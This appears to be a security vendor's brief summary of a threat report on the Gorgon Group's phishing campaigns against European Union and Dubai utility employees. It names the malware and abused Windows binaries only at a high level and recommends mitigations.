The expansion of Gorgon’s techniques indicates they aren’t just fishing for victims, but have targets in their sights.
Prevailion’s Tailored Intelligence team has uncovered details of new, sophisticated cyber-crime campaigns from the Gorgon Group, which now traps its victims through spoofed login portals for the European Union and a Dubai-based utility.
In October, the team first reported on the suspected Pakistani group’s MasterMana Botnet campaign. That operation is continuing today, along with two newly discovered clusters of activity, which have exhibited more targeted attacks, including European travelers and Dubai’s electrical and water authority.
Within each prong of its three-part attack, the Gorgon Group has avoided detection by implementing moderately sophisticated methods of bypassing common security mechanisms, making them a true threat to organizations that fall in their sights.
The tools for these attacks have involved a new downloader that references the rapper Drake, a .net executable named “Office” (for User Access Control bypass and Windows Defender disabling), a variant of the NJrat trojan, and a new, trojanized PowerPoint file.
Much of this new activity happens on domains hosted by the threat actors, who appear to be targeting European Union and Dubai utility employees by “spoofing” or impersonating legitimate login pages for these organizations.
One spoofed website depicted a login portal with a title of “European Union”, while a second login portal was labeled “DEWA Dubai”, presumably Dubai’s electrical and water authority (DEWA). While we are not able to determine if either site was operationalized, their presence suggests there is a more targeted component to this threat actor activities beyond mass spamming to create the MasterMana botnet.
Such attacks start with a malicious email, and when activated, can result in payloads being covertly loaded onto computers, resulting in compromised credentials and confidential information.
Once the systems were compromised, threat actors propagated their attacks by hijacking software pre-installed by Microsoft on its Windows operating systems—mshta.exe, msbuild.exe and cmstp.exe.
The Tailored Intelligence team at Prevailion recommends implementing Windows recommended block rules for high-risk users, among other mitigating solutions. To learn more, read the full Gorgon Group report on the Tailored Intelligence blog.